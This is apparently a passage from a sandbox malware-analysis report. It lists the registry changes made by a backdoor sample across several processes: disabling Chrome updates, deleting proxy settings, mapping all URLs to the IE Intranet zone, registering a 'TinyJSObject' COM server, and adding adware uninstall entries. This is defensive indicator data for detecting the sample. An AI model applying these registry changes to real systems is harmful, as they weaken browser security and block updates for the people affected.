[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1176 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"SilentUninstall" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayIcon" = "%System%\msiexec.exe"
"CategoryName" = "Apps"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"ProductName" = "WWhiteCouPooni"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"NoRepair" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"InstallDate" = "20150509"
"NoModify" = "1"
"UninstallString" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 3B 87 11 89 AB 78 A3 A9 D1 7F 07 27 F9 62 4E"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayName" = "WWhiteCouPooni"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1988 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"SilentUninstall" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"InstallDate" = "20140222"
"Publisher" = "ActiveCoupon"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"UninstallString" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayName" = "ActiveCoupon"
"NoModify" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"NoRepair" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 63 AF 00 98 6D 98 39 66 CA 6D B1 37 AD 6F F1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"ProductName" = "ActiveCoupon"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:368 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\""alpha_installer""/n]
"last" = "13075686372168"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 BC A7 08 2A EB 60 D1 52 C0 23 81 D7 42 92 6B"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1888 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 48 D7 33 BA 18 38 EE F1 A4 96 76 F7 F7 CC"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
